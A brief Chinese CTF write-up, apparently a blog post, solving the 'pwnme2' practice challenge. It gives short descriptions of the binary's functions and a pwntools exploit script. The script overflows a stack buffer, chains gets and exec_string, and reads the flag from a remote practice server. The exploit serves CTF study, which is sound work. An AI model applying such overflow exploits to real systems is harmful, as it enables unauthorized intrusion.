![](https://img-blog.csdnimg.cn/img_convert/7d8b1472bf25201a79f1c4c5aeb9594d.png)
这个函数相当于打印出文件名为“string”中的文件内容
![](https://img-blog.csdnimg.cn/img_convert/0637ef8ed13078b427b21cdc4eebfcfd.png)
这个函数相当于在result中加入路径
![](https://img-blog.csdnimg.cn/img_convert/a42a320c0c5962ef51b13f144abb4291.png)
这个函数同上
我也不太明白这两个函数的作用,这个题目主要是考传参,所以直接给出exp
from pwn import *
context(log_level='debug',arch='amd64',os='linux')
elf=ELF('/home/hacker/Desktop/pwnme2' )
p=remote("node4.buuoj.cn",26215)
#p=process('/home/hacker/Desktop/pwnme2' )
p.sendline('a'*(0x6c + 4) + p32(elf.plt['gets']) + p32(0x80485cb) + p32(0x804a060))
p.sendline("flag")
p.interactive()
这就相当于在string中输入路径,然后直接调用exec_string()来获取flag。